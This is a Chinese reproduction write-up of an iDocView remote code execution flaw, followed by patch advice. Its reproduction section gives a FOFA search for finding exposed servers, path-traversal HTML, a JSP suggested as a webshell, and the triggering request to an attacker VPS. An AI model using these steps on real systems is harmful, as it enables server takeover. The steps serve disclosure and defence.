I Doc View在线文档预览系统RCE漏洞(QVD-2023-45061)

0x01 产品简介

iDocView是一个在线文档解析应用,旨在提供便捷的文件查看和编辑服务。

0x02 漏洞概述

漏洞成因

本次漏洞出现在在线文档解析应用中的远程页面缓存功能。具体问题在于该应用未能对用户输入的URL进行充分的安全验证,从而导致存在安全隐患。攻击者可通过构造特殊的URL,引诱应用下载恶意文件。

利用特征

攻击者利用该漏洞的关键在于使用具有远程页面缓存功能的接口,在参数中填写预先准备的包含恶意文件的URL。此类请求能够绕过正常的安全检查,使得服务器下载并处理恶意内容。漏洞的触发会返回特定的响应状态和内容类型条件,攻击者可通过自动化脚本进行检测和利用。

漏洞影响

该漏洞的利用可能导致服务器被远程控制、敏感数据泄露等等。漏洞的存在不仅威胁到该应用服务器的安全性,还可能成为更广泛网络安全事件的触发点。建议受影响的用户尽快采取必要的安全措施,以防范潜在的安全风险。

0x03 影响范围

iDocView < 13.10.1_20231115

0x04 复现环境

FOFA:title=="在线文档预览 - I Doc View"

0x05 漏洞复现

VPS上构造一个携带恶意link[href]的html文件,里面的link指向你的恶意文件

构造index.html

复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <title>test</title>
</head>
<body>
  <link href="/..\..\..\docview\test.jsp">
</body>
</html>

构造恶意文件

复制代码
vi '..\..\..\docview\test.jsp'


<%out.print("test");%>      #可以是马子

python开启一个http服务器,发送请求

复制代码
http://your-ip/html/2word?url=http://VPSip/index.html

当两个请求都响应200时会下载一个word文件,表示利用成功

验证

GetShell

0x06 修复建议

目前官方已发布安全修复版本,受影响用户可以自行更新或者联系相关技术支持获取最新版本或补丁修复漏洞。

https://api.idocv.com

缓解措施

隔离该系统对外访问,仅允许受信任网络或者用户访问。

拦截受影响Api接口的请求访问。

相关推荐
Ginkgo_Lo1 小时前
【LLM越狱】AI大模型DRA攻击解读与复现
人工智能·安全·ai·语言模型
七牛云行业应用2 小时前
企业级AI大模型选型指南:从评估部署到安全实践
大数据·人工智能·安全
CV-杨帆4 小时前
大模型在题目生成中的安全风险研究综述
人工智能·深度学习·安全
猫耳君5 小时前
汽车功能安全 Functional Safety ISO 26262 测试之一
测试开发·安全·汽车·功能安全·汽车测试·汽车电子测试
ZYMFZ5 小时前
Linux系统 SELinux 安全管理与故障排查
linux·运维·安全
BillKu6 小时前
Vue3 中使用 DOMPurify 对渲染动态 HTML 进行安全净化处理
前端·安全·html
云边云科技18 小时前
门店网络重构:告别“打补丁”,用“云网融合”重塑数字竞争力!
大数据·人工智能·安全·智能路由器·零售
lingggggaaaa19 小时前
小迪安全v2023学习笔记(八十一讲)—— 框架安全&ThinkPHP&Laravel&Struts2&SpringBoot&CVE复现
笔记·学习·struts·安全·网络安全·laravel
NewCarRen19 小时前
汽车EPAS ECU功能安全建模分析:Gamma框架+深度概率编程落地ISO 26262(含寿命预测案例)
安全·汽车
Amy1870211182320 小时前
中线安防保护器,也叫终端电气综合治理保护设备为现代生活筑起安全防线
人工智能·安全·智慧城市